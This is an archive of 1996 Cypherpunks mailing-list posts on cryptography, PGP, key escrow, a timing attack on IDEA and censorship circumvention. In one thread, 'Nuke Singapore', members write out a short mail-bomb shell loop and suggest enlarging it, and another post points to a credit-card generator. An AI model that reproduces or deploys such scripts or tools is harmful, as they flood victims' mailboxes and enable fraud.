Subject: Re: **"OuR" Project press release** (fwd)
Message-ID: <199608310209.VAA11299@oak.zilker.net>
MIME-Version: 1.0
Content-Type: text/plain


 Jim, as your back of the envelope calculations indicate LEO is very
difficult.  Luckily, the members of ouR team know this, and have no naive
desire to achieve such a goal.  Don't know how you thought they did....

Stu
-----------------
Stu Barrett
e-mail: stu@zilker.net
Phone: 512-255-6052

"Out the transceiver, down the coax, through the router, down the
fiber, off another router, down the T1, past the firewall.....nothing
but Net."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 31 Aug 1996 14:58:16 +0800
To: "Andy Brown" <cypherpunks@toad.com>
Subject: RE: Mimic Function Stego Programs?
Message-ID: <19960831045604375.AAA197@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 30 Aug 1996 09:33:18 +0100, Andy Brown wrote:

>> dictionary: 1=sofa 0=couch
>> input: The couch is very comfortable
>> output (0): The sofa is very comfortable.
>> output (1): The couch is very comfortable.
>
>This idea generalises well from human to computer assembly languages.
>You often have a choice of which instruction to use to achieve your goal,
>and a stego assembler could quite easily be constructed.

I *like* it!

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 31 Aug 1996 14:56:27 +0800
To: "steve@miranova.com>
Subject: Re: Nuke Singapore Back into the Stone Age
Message-ID: <19960831045604375.AAB197@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Aug 1996 14:48:34 -0700, Steven L Baur wrote:


>Charley> We could launch a mail-bomb campaign.. I am looking for the
>Charley> source for a mail bomb program. WinTel would be nice but I
>Charley> could use Linux
>This isn't rocket science.
>#! /bin/sh
># call as:  mailbomb victim@somewhere.sg
>while true; do
>	mail $1 < /usr/local/bin/xemacs
>done

Better yet, use ls -r /news to build a list of things to send. Nasty!

>What are the last two letters of "doesn't" and "can't"?
>Coincidence?  I think not.
<ooh> BAD!  Somebody shoot him!

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Sat, 31 Aug 1996 07:33:40 +0800
To: Dale Thorn <cypherpunks@toad.com>
Subject: Re: Encryption
In-Reply-To: <3226ADC6.6C87@gte.net>
Message-ID: <9608302207.aa06439@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <3226ADC6.6C87@gte.net>, Dale Thorn writes:
>It appears to me that PGP encryption et al is really 1940's technology, 
>albeit fancied up by 1990's computers. 

	1940s cyphers all had a secret key. Said key had to be forwarded to
the recipient, usually via a courier. PGP doesn't need this. It is a hybrid
system using IDEA to encrypt the message with a random session key and RSA to
encrypt the session key. It also offers digital signatures, something 1940s
cyphers didn't. 

	Your proposal, however, looks as if it is impossible for the recipient
to decrypt the message!

	Derek Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 31 Aug 1996 07:19:19 +0800
To: cypherpunks@toad.com
Subject: Re: www.anonymizer.com
Message-ID: <199608302014.WAA08916@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:12 AM 8/30/96 -1000, NetSurfer wrote:
>
>I have found and reported to the anonymizer that it does not 
>always protect you against perl-based cgi scripts.  I did this by 
>accessing a form-based email page (based on Matt's script) which includes 
>environment variable values in the msg to the recipient.  I didn't 
>receive any response back from them after I emailed them the info.


   Am I missing something here because isn't the easiest way around all of this is simply not to enter your personal info when setting up Netscape?  Granted the page can pick up your ISP and what port you used, but so what?  It can't get your name and email address.  Use a newsreader such as Free Agent so there's no reason to enter your personal info.  If there is a reason to respond to someone who's email is in on a particular page, then copy it and paste to your emailer...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 31 Aug 1996 15:32:42 +0800
To: "Ross Wright" <whgiii@amaranth.com>
Subject: Re: Intel to rule the basic crypto engine market?
Message-ID: <19960831053943812.AAA111@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 30 Aug 1996 19:42:31 -0700, Ross Wright wrote:

>goverment  (government)
>alow   (allow)        
>here cries  (Should be hear)
>atemps  (attempts)
>instpected  (inspected)
>believeing   (believing)

You know, we've all realized that even an anal retentive can use a spell
checker on someone else's posts.  Do we really need continual proof?

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 31 Aug 1996 09:51:59 +0800
To: cypherpunks@toad.com
Subject: GAK by TIS
Message-ID: <199608302326.XAA02261@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Network World, August 26, 1996, Page 1 
 
 
   Key-escrow firewall ready to leave the country 
 
   by Ellen Messner, Washington D.C. 
 
 
   After months of talk about exporting encryption software, 
   there will finally be action. 
 
   Fulfilling the Clinton Administration's vow to end export 
   restrictions on strong encryption products if they use 
   key-escrow features, the U.S. government this week is 
   expected to permit Trusted Information Systems, Inc. 
   (TIS) to sell its Data Encryption Standard (DES)-equipped 
   Gauntlet firewall overseas. 
 
   Such exports will allow U.S.-based companies to 
   standardize on an encrypting firewall for all global 
   operations. 
 
   The Department of Commerce is granting mass-market export 
   status to a specific version of the Gauntlet firewall 
   based on a key-escrow scheme that gives U.S. law 
   enforcement access to a master key for decrypting IP 
   datastreams. 
 
   The master key for each firewall will reside at Oakland, 
   Calif.-based Source Files, Inc., the third-party private 
   key holder chosen under the government's groundbreaking 
   plan. 
 
   Vice President Al Gore has supported the Defense 
   Department's view that unbreakable encryption should be 
   controlled because it is a powerful weapon and subject to 
   misuse by criminals and terrorists. However, Gore 
   recently said the government will allow mass export of 
   64-bit encryption products if they use key escrow. The 
   agreement with TIS is the first evidence that the policy 
   is being put into practice. 
 
   Until now, few companies other than banks could get the 
   State Department and National Security Agency (NSA) to 
   let them export 56-bit and higher Data Encryption 
   Standard (DES) products. Only 40-bit products, easily 
   broken with available computer resources, were allowed 
   for mass-market export. 
 
   "We're on the verge of a major shift," said TIS president 
   Steve Walker last week. TIS expects to unveil a raft of 
   other vendors in the network industry that will license 
   the TIS data recovery method for accessing data encrypted 
   with a session key. 
 
   The government is also considering approving other third- 
   party keyholders in addition to Source File, which has 
   traditionally held source code in escrow on behalf of 
   companies worried about the long-term viability of their 
   suppliers. 
 
   Just say no 
 
   Not all are key-escrow converts, however. In fact, it is 
   painfully clear that corporations will continue to balk 
   at the prospect of their encryption keys being held by a 
   third party or the government. 
 
   Netherlands-based Royal Dutch Petroleum Co., with 
   hundreds of subsidiaries and offices all over the world, 
   is looking to ditch dedicated private lines and send 
   encrypted IP traffic over the Internet instead. 
 
   The State Department's mass-market license for the 
   Gauntlet means TIS can compete to provide Royal Dutch 
   Petroleum with its encrypting firewall. But Homayoon 
   Tajalli, TIS vice president, acknowledged that the Dutch 
   oil conglomerate is unwilling to hand its encryption keys 
   over to Source File. 
 
   Hence, as part of negotiations with the U.S. and Dutch 
   governments, Royal Dutch Petroleum agreed to operate its 
   own data recovery center for the Gauntlet master keys. 
   Royal Dutch Petroleum would hand over the master 
   encryption keys to to Dutch law enforcement, which in 
   turn would give the keys to U.S. authorities "if the 
   government shows up with a valid warrant," Tajalli said. 
 
   TIS went to great lengths to broker the international 
   arrangement, and hopes that not every firewall export 
   will entail such laborious negotiations. 
 
   Some firewall users are extremely ambiguous about the 
   government's key-escrow plan. 
 
   "I'm not sure I want the government to have that 
   ability," said Doug Miller, information systems manager 
   at Bluestone Corp. "At all cost, we've got to keep the 
   government out of business operations." 
 
   [End] 
 
   Thanks to BC. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 31 Aug 1996 18:29:08 +0800
To: cypherpunks@toad.com
Subject: RE: Encryption
Message-ID: <ae4d2e5407021004a8c9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:52 PM 8/30/96, Benjamin Suto wrote:
>I'm probably the last person who could mention something intelligible
>here, but assuming this encryption algorithm works, and Joe wants to give
>Jane a file, how would he tell her how to decrypt it?

There are two parts to this: the algorithm and the key.

For a strong cipher, the algorithm can be told to Jane...there is no real
security in "security through obscurity."

The remaining part is the _key_. It can be communicated in person, prior to
sending the message (or after, though this is of course a less interesting
situation). Or by a trusted courier, again prior to the encrypted
communication.

(A common thought error newcomers make is to ask "If the key can be
communicated securely, why is encryption needed?" Think of military
communications--the keys are established before a mission, then units can
communicate securely, even over insecure radio channels.)

Public key cryptography allows Joe and Jane to communicate without any
exchange of private key material. Joe encrypts a message to Jane's public
key, then sends it by some channel. Jane can decrypt it, using her private
key.

>If he found a "secure medium" to give her the passcode under, wouldn't
>encrypting it be useless since he could just use that secure medium to
>send the original file?

As I said, think of _time value_. It is often necessary to exchange key
material (or get public keys in advance of a communication) before a
message sending is needed. Also, key materials may be exchanged via
reasonably-secure channels, such as FedEx delivery, and then the Internet
may be used for actual messages. While FedEx may be vulnerable to
interception in certain cases, clearly this is an improvement over using no
encryption.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Sat, 31 Aug 1996 18:35:17 +0800
To: cypherpunks@toad.com
Subject: Re: MUD anyone?
In-Reply-To: <ae4c85ab040210040813@[205.199.118.202]>
Message-ID: <9608310823.AA00984@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Tim May wrote:
>At 4:27 PM 8/30/96, Jon Leonard wrote:
>>Tim May wrote:

[difficulty of coding crypto, even for a MUD]

>>I don't think it's quite that hard, so I tried to implement asymetric key
>>cryptography:
>>
>>20 minutes, to write and debug:
>
>Well, cryptography (per se) is the most basic, and in some sense simplest,
>part of the whole thing: the "semantics" of crypto are well-understood
>(even if not to the snake oil salesmen and repeated inventors of one time
>pads).
>
>Consider that PGP was basically a realization (others existed, natch) of
>ideas that were almost 20 years old.
>
>Some much harder (to me) protocols: fair coin tosses, blinded coins,
>oblivious transfers, digital cash in all its many forms (and issues),
>DC-Nets, and so on. Sure, bits and pieces are codable--and have been--but a
>comprehensive package is tough to write. Wei Dai's and Matt Blaze's
>libraries are excellent, I hear, but are not targetted at creating these
>building blocks for crypto anarchy.

Thanks for the list of useful protocols to consider.  I'll wind up
getting the rest from Applied Cryptography and your Cyphernomicon if
I don't get any more input.

Some of these are fairly easy to fake, though.  Fair coin tosses, for
example:

Assume a perfectly trustworthy escrow agent.  (A bad assumption in
real life, but workable on a MUD, where it's the server.)
Tell the agent to wait until all parties have contributed a bit,
and then announce the XOR of the bits.  As long as an individual
has picked a bit randomly, and given it to the escrow agent securely,
the result is random.

That doesn't answer the questions of integration into a game, or how
make a crypto anarchy out of it.  I'll just have to try things and
see what works.

>Your code is admirable. I did the same thing in Mathematica, a few years
>ago when I was still interested in the innards of RSA. (It took me longer
>than 20 minutes to write, though...but I also got to play around with big
>primes, the basic number theory stuff, etc. A useful learning experience.)

My code doesn't do nearly as much as you seem to think it does.
All of its "security" relies on a mutually trusted interpreter, which
isn't a bad assumption on a MUD.  I'm cheating on the cryptography,
but I think I can get away with it for the purposes of a game.

And, of course, I didn't comment it, document it, or integrate it into
the rest of the game.

>But implementing more recent cryptographic building blocks seems more than
>an order of magnitude harder. (If you can implement a reasonably robust
>bank-digicash system in 10 x 20 minutes = 3.5 hours, I'll be impressed.
>Merely speccing what it should do and how it should behave in various
>situations would take far, far longer than this. Just my view. Maybe I'm
>wrong.)

Even if it's more than that much harder, it's still worth doing.  I'll
see how long it takes, but I'll try for robustness instead of coding
speed.

>>It is a big project, but the big part is writing the MUD, not adding the
>>crypto-anarchy stuff to it.  I'm writing a MUD anyway, and have been off
>>and on for over a year.  Mark Grant's message made me think about what it
>>would take to add the features I wasn't already planning on.
>
>Depends on what you mean by "crypto-anarchy stuff." As I see it, it means
>building a reasonably robust economic system, a market or agora with
>various transaction mechanisms built in. Sort of a cross between "SimCity"
>and Vinge's "True Names."

"True Names" is a better fit than SimCity for what I'm imagining.  In
the absence of any better ideas, it'll borrow a lot from LPmud too.

I've considered a game-run anonymous market, with bid and asked prices
akin to the stock market equivalents.  Characters would have the money
(or whatever) unavailable until the bid or ask was withdrawn, and clearing
would be automatic in case of a match.

It's more appealing if the market is magically provided by a wizard of
some reputation, but game-run is simpler to start with.

>--Tim May

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 31 Aug 1996 18:40:51 +0800
To: "Osborne, Rick" <OSBORRI@msmail.northgrum.com>
Subject: Re: Real-time key server
Message-ID: <199608310844.BAA00275@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:30 PM 8/27/96 DST, "Osborne, Rick" <OSBORRI@msmail.northgrum.com> wrote:
>In my research into keyservers, I find that none of them are realtime. 
> Sure, there are CGI interfaces to them, but that's not what I mean.  I was 
>hoping for something along the line of a Finger or SMTP protocol, such that 
>a client connects to a host (say, keyserv.northgrum.com) on a certain port 
>(say, 5397) and goes through a realtime version of what is accomplished via 
>email. [...]
>Why?  Because:
>1. I do not want to reinvent the wheel.
>2. I would like to conform to existing standards.

There are at least three shapes of wheel readily available.

Some of the keyservers have had finger interfaces; there was one on
wasabi.io.com for a while, though it may be inactive.  John Perry
may know where to find source code for it?  Assuming you want PGP keys
delivered in ASCII format, finger protocol should work just fine - you could
easily enough hack your own fingerd server to live on the fingerd port,
which gets PGP key files from a directory or database instead of from
users' home directories, and run it on pgp.northgrum.com or whatever.
You could even hack the existing finger code from {Free,Net}BSD,
making sure to clean up any remaining sprintf()s and {*}get()s.

Alternatively, a CGI query _is_ an easy way to do it, and there's
existing code on the MIT keyserver that's blazingly fast.

John Gilmore's SWAN project is using a DNS-based PGP key server;
check out http://www.cygnus.com/~gnu/swan.html for more details.


>Okay, I was told to not post to the list until I'd:
>1. Lurked for a month,
>2. Figured out who Detweiler was,
>3. Found out about BlackNet and DC Nets,
>4. Learned of at least three of David Chaum's innovations.
>And at that point "[I] may be ready to post [my] first comments."
>
>Well, dammit, I can't wait that long.  I need help now.  I've only been on 
>for 2 weeks, I have no clue who Detweiler is (other than the
>welcome message I haven't heard two words about him/her/it), and I know 
>enough to sound stupid about the other stuff.  But if you still think I'm 
>worthy of listeneing to, then read on.

Three out of four ain't bad, and Detweiler's been using his alias on
the list for a couple of years and acting quite civilized :-)
Some good reading sources are Bruce Schneier's book "Applied Cryptography"
and Tim May's "Cyphernomicon" piece which is on the web somewhere.
Also, asking for pointers to existing work does categorize you
with the clueful minority.....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 31 Aug 1996 18:42:25 +0800
To: "Michael T. Babcock" <mbabcock@tyenet.com>
Subject: PGP Comments Considered Occasionally Harmful Re: Pronto making a comment
Message-ID: <199608310847.BAA00304@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To cypherpunks, Re: mbabcock and Jim Ray's discussion.

>> How did you get Pronto to do a comment?
>
>I added a "comment=" in my config.txt ;) ... the old fashionned way.
...
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.3i
>Charset: ascii
>Comment: http://www.cyberbeach.net/~mbabcock/PGP/

Note that the comment makes traffic analysis much easier.
Sure, you can send your mail through five different remailers,
but if each layer of PGP has your home page URL or some other
distinctive Comment:, it's traceable.

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

iQBVAwUBMif6ZvthU5e7emAFAQHh2AH/R4KY4MPQBjF2XCeeFCY5XPVQTePvPwT6
5MAAzyTL/8RwU0Ul7G7rQgeb/08CxqetC0Ry22AhMV8uEV6DgTbcLg==
=4Ttw
-----END PGP SIGNATURE-----

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <billstewart@worldnet.att.net>
Date: Sat, 31 Aug 1996 19:29:24 +0800
To: cypherpunks@toad.com
Subject: IDEA and timing attacks
In-Reply-To: <RDPyBl2.jmkelsey@delphi.com>
Message-ID: <3228024F.1C1A@worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


John Kelsey <jmkelsey@delphi.com> wrote in sci.crypt
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> [ To: sci.crypt ## Date: 08/24/96 03:11 am ##
>   Subject: IDEA and Timing Attacks ]
> 
> I'm still kind-of recovering from this year's Crypto conference, but
> I told several people I would post this.  At the rump session this
> year, I presented an arguably practical timing attack on many
> implementations of IDEA.  There are actually two attacks available,
> but one requires extremely fine timing results.  After I gave the
> presentation, Willi Meier told me he had independently found the
> same results, and had implemented the full attack (which I hadn't
> yet done).
> 
> There are two different attacks.  The most practical is an
> adaptive chosen-plaintext attack, which requires about 5*n*2^{16}
> chosen plaintexts (read ``five n times two to the sixteenth''),
> where the parameter n depends on the precision of timings available
> and the timing variability of the implementation.  The second attack
> is ciphertext-only, but requires timing measurements precise enough
> to detect the difference between a single multiply of a zero vs.
> nonzero value.  It requires about 5*n*2^{16} values, as well.
> 
> The basic idea behind the attack is as follows:  in many
> implementations, a zero input into the multiply operation is handled
> by an if statement, and so does not cause a multiply instruction to
> actually be executed.  The result on a 486 is that it is
> significantly faster to multiply by a zero rather than a nonzero
> value.  This timing difference gives us a really nice way to learn
> information about the internal values of the cipher.
> 
> This presentation is necessarily not very good, since I can't embed
> a diagram here.  If you have a copy of _Applied Cryptography_, then
> turn to the section on IDEA (page 321 in the hardback version of the
> second edition).  The diagram shows one round of IDEA, and then
> (after the ellipses) the output transformation.
> 
> The chosen plaintext attack works as follows:
> 
> 1.   Build a run of n*2^{16} chosen plaintexts, by choosing a
> single value for X_1, and choosing n of each possible value for X_3,
> with X_2 and X_4 taking on values at random.  Time the encryption of
> each batch of n plaintexts with the same X_3 value.
> 
> 2.   Choose a new value for X_1, and then build another run of
> chosen plaintexts exactly as above.
> 
> 3.   For each of these two runs, if the value of Z_5 is not zero,
> there should be a different value for X_3 that gives the lowest
> encryption time.  (These are the values that force the input to the
> multiply with Z_5 to be zero.)  Call these X_3 and X_3'.  This gives
> us two equations in two unknowns, and we can solve for it with a
> 32-bit brute-force search.  (There may be faster ways, as well.)
> 
>      (X_1 (*) Z_1) = (X_3 + Z_3)
>      (X_1'(*) Z_1) = (X_3'+ Z_3)
> 
> We now have recovered Z_1 and Z_3.
> 
> 4.   Let's call the input to the multiply with Z_5 A.  We can use
> knowledge of Z_1 and Z_3 to force A to keep the same value.  We then
> choose three new runs of chosen plaintexts, each containing 2^{16}
> batches of n plaintexts apiece.  Each of these ensures that A and
> X_2 are kept constant, so that we wind up three difference values
> for A, X_2 and X_4 which correspond to zero inputs into the multiply
> with Z_6.  This means that we wind up with three equations in three
> unknowns.
> 
>      (A  (*) Z_5) + ((Z_2 + X_2  ) XOR (Z_4 (*) X_4  )) = 0
>      (A' (*) Z_5) + ((Z_2 + X_2' ) XOR (Z_4 (*) X_4' )) = 0
>      (A''(*) Z_5) + ((Z_2 + X_2'') XOR (Z_4 (*) X_4'')) = 0.
> 
> This can be solved with a 48-bit brute force search (there are
> probably faster ways).  We now have 80 bits of IDEA's key, and can
> brute-force search the remaining 48 bits.
> 
> Note that this is actually an adaptive chosen-plaintext attack as
> described.  I'm pretty sure this can be turned into a proper
> chosen-plaintext attack with some work, and I'll probably be hacking
> on this in the next few weeks, as time allows.
> 
> The ciphertext only attack is simpler in some ways.  The first 32
> bits are extremely easy to recover--find the average time to encrypt
> blocks with each value in their first and last 16 bits, and then
> solve for the subkey values that would be necessary for those
> multiplies to have zeros as their inputs.  Next, we look for a
> correlation between low encryption times and the values for Z_3 in
> the output transformation that would result in zero inputs into the
> previous round's MA box multiply.  Finally, we attack the second
> multiply in that MA box, using all four output values.  The
> approximate computational difficulty is 2^{48}, as before.
> 
> There are other timing attacks on IDEA.  We gave one in our paper at
> Crypto this year (the one on related-key cryptanalysis of several
> ciphers, by Bruce Schneier, David Wagner, and me), and the
> related-key timing attack is where I got the idea to try a timing
> attack on the whole cipher.
> 
> All timing attacks are implementation-dependent to some extent.  On
> a Pentium, I suspect the timing attack will be considerably harder.
> (One person I discussed the attack with said he thought it would
> take longer to do the conditional branch for the if statement than
> to do the multiply, so we might have zero multiplies taking more
> rather than less time.)
> 
> Most applications aren't really susceptible to timing attacks,
> because of the way they're used.  In addition, chosen-plaintext
> attacks on block ciphers are pretty nicely thwarted by using CBC or
> CFB modes.  It is probably also possible to implement IDEA so that
> it executes in constant time.  I should point out that it is *NOT*
> enough either to add random delays (which fall out if you add more
> samples), nor to just get rid of the big timing difference with zero
> inputs (though that will make timing attacks somewhat more
> difficult).  As long as internal (secret) information is being
> leaked by timing, the cipher is probably vulnerable to some kind of
> timing attack.
> 
>    --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
>  PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMh7GKEHx57Ag8goBAQEqGQQApXRQUMWz3gpJIwGrLbVhcgcpSMXyrq0g
> iTi2qjH7dJjmWugpLnbm18XHzOPZMKizdZ/gin1O3Rk89dXfqK4sIICwY3QmkwFR
> ZQ2My4mTUn27ibjAjZTDuvxLXnqqoOFRrMUTQGIlMTCZdBooSWrif+pTLQbIsoPr
> saHlDl2bWts=
> =tWIq
> -----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <billstewart@worldnet.att.net>
Date: Sat, 31 Aug 1996 19:14:28 +0800
To: cypherpunks@toad.com
Subject: FWD: Re: Tiger?
In-Reply-To: <5jITplH.padrote@delphi.com>
Message-ID: <3228029E.233F@worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Schneier wrote in sci.crypt :
> 
> In article <505bms$2m1@kadri.ut.ee>, sander@haldjas.folklore.ee (Sander
> Vesik) wrote:
> 
> > Bruce Schneier (schneier@counterpane.com) wrote:
> > : Tiger is a one-way hash function designed by Eli Biham and Ross Anderson.
> > : It is optimized for a 64-bit chip (DEC Alpha).  While interesting, Tiger
> > : is very new, completely unanalyzed (except by the authors), and hence
> > : still suspect.  On the other hand, it's lightning fast on 64-bit machines.
> >
> > : Wired is displaying typical uneducated hype in its mention.  I recommend
> > : that everyone look at Tiger, but that no one use it yet.
> >
> > It is round 2.3 times faster than MD5 on my Pentium - so the part about
> > high speed on the 32bit chips also seems to hold.
> 
> It is certainly fast, and it is definitely not your typical snake oil.
> It's just a mistake
> to start using an algorithm immediately after it is published.
> 
> Bruce
> 
> **************************************************************************
> * Bruce Schneier              APPLIED CRYPTOGRAPHY, 2nd EDITION is
> * Counterpane Systems         available.  For info on a 15%
> * schneier@counterpane.com    discount offer, send me e-mail.
> *
> * For Blowfish C code, see ftp.ox.ac.uk:/pub/crypto/misc/blowfish.c.gz
> **************************************************************************

-- 
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Sat, 31 Aug 1996 16:49:33 +0800
To: maldrich@grci.com
Subject: Re: your mail
In-Reply-To: <Pine.SCO.3.93.960826094019.6590A-100000@grctechs.va.grci.com>
Message-ID: <19960830.014955.9606.3.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Their is a half decent credit card generater that comes with aohell.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Sat, 31 Aug 1996 17:16:30 +0800
To: cypherpunks@toad.com
Subject: encryption
Message-ID: <19960830.020300.9606.7.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Will pay $5.00 for a good encryption program.   Write to
patrickbc@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 31 Aug 1996 21:02:37 +0800
To: cypherpunks@toad.com
Subject: Building the Singapore Free Press
Message-ID: <199608311101.EAA01447@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Suppose you wanted to build a free press for a country like
Singapore that has a government that doesn't want one -
on the net, from the inside and outside.  What tools would you need?
Assume a Firewall Curtain proxy that can block sites and keywords but
can't really block encryption.  Also assume that the ISPs inside the
Firewall Curtain can't do much to help you, given government licensing
and other threats.  How can you help people communicate with each other
without interference?

The Web isn't a bad tool for it, but it's easy to block 
specific web sites and specific host machines, so you'd need
some combination of replication and DNS-manipulation to let
sites change names conveniently and frequently.
Has anybody developed a good DNS mechanism for reassigning
namespace conveniently (e.g. a meet-me system allowing any machine 
to connect up to a given name, so anybody who wants to can be
foobar23.remailer.net)?

There are web conferencing tools that would be a decent
user interface.

You'd need some mechanism for anonymous submissions;
remailers and web-based forms both work. 
Journalists have a long history under pseudonyms 
in British colonies and other non-free territory :-)

You'd need a mechanism for finding the news from inside SG;
search engines like AltaVista can pretty much handle that
except that you need a method for sending encrypted requests,
so the Firewall Curtain can't block them and the
government can't tell what you're searching for.
Perhaps an SSL-protected form with a CGI to submit to AltaVista?

Does anybody know the protocols of the Firewall Curtain
well enough to slide things into the cache?  (This is an 
httpd hacking question....)

What other tools would be useful?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Sutherland <maverick@thepentagon.com>
Date: Sat, 31 Aug 1996 20:19:44 +0800
To: cypherpunks@toad.com
Subject: Local Obscenity Regulations
Message-ID: <19960831100811343.AAA184@maverick>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Sat Aug 31 05:05:19 1996
If the BS coming from the Observer wasn't bad enough, check this out:

http://www.cnet.com/Content/News/Files/0,16,2316,00.html

Seems that Oregon has a ballot up for measure which will allow each city 
and county to decide for itself what obscenity is.  I'm really not sure if 
this'll hold up or not, but I can see every hick sheriff in the state 
trying to get his fame by busting someone or something.  
- ---
Sean Sutherland       | GCS/C d- s+:+ a--- C+++ V--- P L E- W++ N++ K- w o 
PGP Key ID: E43E6489  | O-(++) M-- V PS+ PE++ Y++ PGP++(+) t--- 5+++ X++ R 
Vote Harry Browne '96 | b++ DI+ D+ G e- h! !r y
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: For key finger me or http://www2.interconnect.net/maverick

iQEVAwUBMigOYVZoKRrkPmSJAQEUIwf+O/J8Uy9ZThNnnNagwROWj6uFww8Nuktf
Y1m5rV3dGEyNxGVgaNh4hubI56vUodvk2RhjDrELvc7dwwxgDzK0YNvFk7vmzVFD
o8IT/FjRwCIxx2OUwV2e8jnRiP3okTRecmRpeeL0GaUqulYSsijaTnjTofapARYU
18PpKJxrgJg5a07ybdU4B5JVJ7HzAraY/w32LIGTqRNhoRcORvcox0FDLnswNk7W
ALh4dhCBMyQEhey/v/RfFwjtEBTIarjA6b8zUf+dFweRsNWZAdCugpNWNv6OE65h
in1x5PFttn7ldad2c0PNN7fsu5NUCIjSQNljRsyTnkO1Jctp3Z02mw==
=W3Vk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 1 Sep 1996 12:45:43 +0800
To: cypherpunks@toad.com
Subject: Re: Penet Bites the Dust
Message-ID: <199609010253.TAA28252@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


